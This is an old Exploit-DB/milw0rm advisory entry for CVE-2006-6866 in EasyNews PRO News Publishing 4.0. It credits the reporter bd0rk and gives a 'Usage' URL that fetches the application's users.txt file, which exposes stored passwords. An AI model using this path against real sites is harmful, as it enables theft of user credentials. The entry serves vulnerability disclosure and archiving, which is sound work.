EasyNews PRO News Publishing 4.0 Password Disclosure Vulnerability

2006-12-29T00:00:00
ID EDB-ID:3039
Type exploitdb
Reporter bd0rk
Modified 2006-12-29T00:00:00

Description

EasyNews PRO News Publishing 4.0 Password Disclosure Vulnerability. CVE-2006-6866. Webapps exploit for php platform

                                        
                                            => EasyNews PRO News Publishing 4.0 Remote Password Disclosure Vulnerability <=



=> Affected Software: Easy News 4.0 PRO

=> Risk: Critical

=> Download: http://www.stphp.com/scripts/EasyNews_PRO_4_0.zip

=> Bugfounder: bd0rk

=> Contact: bd0rk[at]hackermail.com

=> Greets: str0ke, crashovernight, TheJT, Kacper

   Usage: http://[target]/[easy_news_path]/newsboard/data/users.txt

# milw0rm.com [2006-12-29]